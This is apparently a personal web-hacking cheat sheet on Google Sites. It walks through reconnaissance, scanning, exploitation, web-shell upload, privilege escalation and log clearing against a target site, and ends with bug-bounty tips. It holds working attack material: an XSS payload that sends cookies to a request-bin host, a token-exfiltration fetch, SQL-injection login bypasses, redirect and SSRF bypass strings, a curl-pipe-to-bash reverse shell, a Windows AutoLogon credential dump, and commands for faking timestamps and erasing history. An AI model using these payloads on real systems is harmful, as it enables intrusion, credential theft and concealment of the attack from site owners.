Disclaimer: This tutorial is just for educational purpose. I am not responsible for any of your shit.
I made this page just to save links, URLs and commands so that I can get them easily whenever I need them. This might not be useful for others.
Embedded Files
Step-1: Reconnaissance
Step-1: Reconnaissance
1) Basic lookup (host,nslookup,traceroute,dnsrecon -d <domain> -t axfr,dig @1.1.1.1 <domain> ANY/NS/MX,whois)
https://www.whois.com/whois/site.com
https://crt.sh/ (dnsdumpster.com)
2) Detecting CMS (whatweb)
Wappalyzer adoon can be used for this purpose (BuiltWith)
(https://whatcms.org/?s=site.com)
4) Detecting Theme (for wordpress)
5) Detecting websites in the same web server
Obtain target's IP from nmap or from here and use the IP in here. If you could not somehow hack into the target from the steps mentioned here, you can use bing to search for the vulnerable sites in the same server and attack the target using symlink. Search Dork example for sql vulnerable site: ip:69.195.124.112 .php?id=
6) Check github repositories, google dorks and web archives.
Step-2: Scanning
Step-2: Scanning
1) Checking robots.txt / sitemap.xml
2) Quick Site scan (netcraft.com)
https://sitecheck.sucuri.net/results/site.com
3) Checking for ports/Os Detection and many more
nmap -v -A -T4 site.com
nmap -sV -sC site.com (-sS -F -oN out.txt)
4) Scanning subdomains (fierce --domain, knockpy)
Use Sublist3r
(python3 sublist3r.py -d site.com)
5) Scanning directories (wfuzz)
Use dirb as dirb http(s)://site.com
6) Scanning admin panel
Use Admin-finder or breacher
python3 admin-finder.py -w wordlist.txt -u site.com python breacher.py -u site.com
Try default password (admin, password, user, pass) and sqli in admin panel ('or 1 = 1 limit 1 - - + OR '= "or')
7) Scanning Web Application Firewall (WAF)
Use wafw00f
python setup.py install
wafw00f https://site.com
8) Overall Scan
nikto -url site.com
3) Trying to gain access
3) Trying to gain access
Now this part is recommended to be done manually by surfing the site and checking features available. Many tools are out there to carry out this step which is not recommended because they are just a set of certain instructions. Although you can use tools to save time.
Checking for subdomain takeover vulnerability
Use this site to check for subdomain takeover vulnerability.
Checking for vulnerabilities in Wordpress
Use wpscan (cmsmap)
wpscan --url site.com -v -e vp vt
wpscan -u site.com --enumerate at --enumerate ap --enumerate u
Scan for multiple vulnerabilities
Use WAScan
python wascan.py --url http(s)://site.com --scan 5
Use w3af (reference: http://docs.w3af.org/en )
Installation:
The easiest way to install w3af in Kali is:
apt-get update
apt-get install -y w3af
This will install the latest packaged version, which might not be the latest available from our repositories. If the latest version is needed these steps are recommended:
cd ~
apt-get update
apt-get install -y python-pip w3af
pip install --upgrade pip
git clone https://github.com/andresriancho/w3af.git
cd w3af
./w3af_console
. /tmp/w3af_dependency_install.sh
Starting scan:
w3af>>> target
w3af/config:target>>> set target http://localhost/
w3af/config:target>>> back
w3af>>>
Finally, run start in order to run all the configured plugins.
w3af>>> start
Check for existing exploits in sites (sn1per -t, amass [enum]/[intel whois] -dir <folder to store logs> -d <domain>)
Use XAttacker
perl XAttacker.pl
Check for open redirect
www.whitelisted.com.evil.com
//google.com or /\google.com
https:google.com
\/\/google.com/ OR /\/google.com/
//google%E3%80%82com
//google%00.com
?next=whitelisted.com&next=google.com
http://www.theirsite.com@yoursite.com/
XSS
The most dangerous attack that can be done by exploiting xss is account takeover by stealing cookie. Example payload:
<script>new Image().src="https://hookb.in/RZe7DaG8KkFREEj72Vyo?c="+document.cookie</script>
onfocus="fetch('REQUESTBINURL/?'+localStorage.getItem('token'))" autofocus
?url=http://safesite.com&site.com
?url=http://////////////site.com/
?url=http://site@com/account/edit.aspx
?url=http://site.com/account/edit.aspx
?url=http://safesite.com?.site.com
?url=http://safesite.com#.site.com
?url=http://safesite.com\.site.com/domain
?url=https://ⓈⒾⓉⒺ.ⓒⓞⓜ = site.com
?url=https://192.10.10.3/
?url=https://192.10.10.2?.192.10.10.3/
?url=https://192.10.10.2#.192.10.10.3/
?url=https://192.10.10.2\.192.10.10.3/
?url=http://127.0.0.1/status/
?url=http://localhost:8000/status/
After these steps, you must be able to find at least 1 vulnerability in the target site. Exploit the vulnerability. Some might give you access to the site. If you didn't find any, I suggest to check for vulnerabilities manually using some cheatcodes such as this. I strictly suggest you to see contents of infosecmatter.com, mavericknerd.github.io, book.hacktricks.xyz, securityidiots.com and gowsunder gitbook.
4) Maintaining access
4) Maintaining access
After gaining access, to maintain our access to the site we usually upload a shell and access to shell through the shell. Shell can be like from simple file uploader like this or this or complex one like this. You can find many in internet. It is to be noted that not all vulnerability gives you access to the site.
6) Rooting the server / Privilege escalation
6) Rooting the server / Privilege escalation
You can't get full control over the target until you get root authority. So go through this tutorial on how to root a server. But here is a quick instruction.
First, you need to understand that you can root the server only if the server is vulnerable.
1) First, we need to note the kernel version of the server. You can see it in uname in the shell or execute “uname -a” command to find it out. For example, Linux 2.6.18
2) Now, find the local root. If the server is vulnerable, you will get it from various websites like Exploit-db, packetstormsecurity, vfocus, injector, etc .
3) Now, go to back connect option in the shell. Enter your “Public IP Address” in SERVER, port you want to connect on, and Finally connect. If you don't want to use your public IP, use ngrok tcp 123 and ping the tcp.ngrok.io and use the IP and the port you got there from ping and ngrok respectively.
4)So now you must receive the back connect with a Tool named netcat.
Spawn the shell using python -c 'import pty; pty.spawn("/bin/sh")' OR python3 -c 'import pty; pty.spawn("/bin/bash")' [curl https://reverse-shell.sh/1.1.1.1:3000 | bash ]
Host root file and make it accesible: python -m SimpleHTTPServer 80
Wget [the link of the local-Root]
Run the exploit
Afetr exploit works, Then see your id uid=0(root) gid=0(root) groups=0(root)
Getting UID=0 means, u had got root priviledges and hence can do variety of stuff (almost everything probably) on the remote server.
If you don't have local root,
If you don't have local root,
use linenum or linpeas or PrivEsc
try to exploit it yourself, these command may help you:
sudo -l
find / -perm /4000 -print 2>/dev/null (https://gtfobins.github.io)
ps
get more commands from here or here.
For Windows, try bruteforcing credentials obtained from AutoLogon registry settings:
Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
7) Clearing traces
7) Clearing traces
Your every login and every activities like creating directory and others are saved as log in the web server. You have to delete all those logs.
touch -a -m -t 202208181055.30 o.php
history -c
find . -name "*.log"
BONUS! Bug Hunting Tips
BONUS! Bug Hunting Tips
-->Checklist: https://pentestbook.six2dez.com/others/web-checklist
--> Look for SSRF bugs in file downloader, video downloader, image downloader websites.
--> Register on hackerone, find bugs on any US DEPARTMENT of DEFENSE websites; it is easy. You won't get bounty in US DOD, you will get points only. Then you will get private invitations in hackerone where very few invited people will hunt for bugs. Try finding bugs in dutch government websites to get an awesome t-shirt as reward
--> Look for IDOR or logical bugs rather than others.
--> Learning resources: infosecmatter.com, mavericknerd.github.io, book.hacktricks.xyz, securityidiots.com and gowsunder gitbook.
--> Check disclosed bug submissions in hackerone. Follow https://twitter.com/disclosedh1 on twitter.
--> Don't just learn to hack; Hack to Learn. Play CTFs and learn from writeups. You know whats the best to learn a certain vulnerability? https://ctftime.org/tasks/?tags=vulnerability_name_like_ssrf
Go to https://ctftime.org/calendar/ and participate in CTfs and see event writeups from event page after CTF is over.
Check these write-ups too: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
-->Tips Gathered from Internet:
https://www.facebook.com/photo?fbid=1152993915068525&set=pcb.1440104806174528
Cr. Hack Training:
Page updated
Google Sites
Report abuse